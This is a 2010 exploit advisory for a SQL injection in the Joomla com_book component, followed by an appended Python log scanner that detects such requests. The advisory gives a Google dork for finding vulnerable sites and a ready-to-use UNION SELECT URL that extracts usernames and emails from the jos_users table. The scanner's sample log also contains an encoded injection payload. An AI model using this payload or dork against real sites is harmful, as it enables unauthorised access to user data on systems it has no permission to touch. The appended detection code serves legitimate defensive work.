# Title : Joomla Component com_book SQL injection Vulnerability
# Published : 2010-01-21
# Author : Evil-Cod3r
==============================================================================
[?] ~ Note : : <3 v4sploiter
==============================================================================
[?] Joomla (com_book) SQL injection Vulnerability
==============================================================================
[?] Script: [ Joomla Comp ]
[?] Language: [ PHP ]
[?] Dork: [ inurl:"com_book" ]
[?] Founder: [ Evil-Cod3r ]
[?] Gr44tz: [ v4sploiter - Mr.SaFa7 - Red Virus - Mn7os - Recruit ='( ]
[?] Team: [ v4-Team.com/cc ]
[?] Price: [ Free ]
###########################################################################
http://localhost/path/index.php?option=com_book&controller=listtour&task=showTour&cid[]=Exploit
Exploit : -
index.php?option=com_book&controller=listtour&task=showTour&cid[]=-1 union all select 1,concat(username,0x3a,email),3,4,5,6,7,8,9,10 from jos_users--
Author: Evil-Cod3r
###########################################################################
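
Added example, not part of the original advisory: a log check a defender could run to spot requests of the kind shown above, by flagging com_book requests whose cid[] value is not a plain integer. It assumes Common Log Format access logs and that legitimate cid[] values are non-negative integers; the function names and sample log lines are constructed for illustration.

```python
# Added example (not from the advisory): flag com_book requests whose cid[]
# values are not plain integers. The log lines below are constructed samples.
import re
from urllib.parse import urlsplit, parse_qsl

# Common Log Format request field: "METHOD target PROTOCOL"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (.+) HTTP/[\d.]+"')
# Assumption: legitimate cid[] values are non-negative integers.
INT_RE = re.compile(r"\d+")


def suspicious_cid_values(target):
    """Return cid / cid[...] values of a com_book request that are not integers."""
    # parse_qsl percent-decodes keys and values, so cid%5B%5D is seen as cid[]
    params = parse_qsl(urlsplit(target).query, keep_blank_values=True)
    if not any(k == "option" and v == "com_book" for k, v in params):
        return []
    return [v for k, v in params
            if (k == "cid" or k.startswith("cid[")) and not INT_RE.fullmatch(v)]


def scan(lines):
    """Return (client_ip, bad_values) for each log line with a non-integer cid."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        bad = suspicious_cid_values(m.group(1))
        if bad:
            hits.append((line.split(" ", 1)[0], bad))
    return hits


SAMPLE_LOG = [  # constructed; client addresses are documentation ranges
    '192.0.2.10 - - [21/Jan/2010:10:00:01 +0000] "GET /index.php?option=com_book'
    '&controller=listtour&task=showTour&cid[]=12 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [21/Jan/2010:10:00:09 +0000] "GET /index.php?option=com_book'
    '&controller=listtour&task=showTour&cid%5B%5D=-1%20union%20all%20select%201,2,3--'
    ' HTTP/1.1" 200 734',
    '192.0.2.10 - - [21/Jan/2010:10:00:15 +0000] "GET /index.php?option=com_content'
    '&id=-1 HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for ip, bad in scan(SAMPLE_LOG):
        print(ip, bad)
```

The same integer-only rule is what the component should enforce on cid[] before the value reaches a query, so a hit in the logs also marks input the application should have rejected.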